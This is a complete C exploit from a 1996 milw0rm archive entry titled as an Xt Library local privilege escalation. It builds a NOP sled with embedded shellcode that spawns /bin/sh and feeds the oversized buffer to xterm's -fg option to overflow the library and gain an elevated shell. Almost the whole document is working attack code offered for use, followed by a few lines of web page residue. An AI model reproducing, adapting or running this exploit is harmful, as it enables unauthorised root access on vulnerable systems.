Xt Library - Local Privilege Escalation

#include 
#include 
#include 

#define DEFAULT_OFFSET          0
#define BUFFER_SIZE             1491

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
   "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
   "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
"\xeb\x18"
   "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
   "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";

   int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

   if(argc>1)
        ofs=atoi(argv[1]);
   if(argc>2)
        bs=atoi(argv[2]);
   printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
        ofs, get_esp()+ofs, bs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, bs-strlen(execshell));
   ptr += bs-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}


// milw0rm.com [1996-08-24]
源链接

Hacking more

...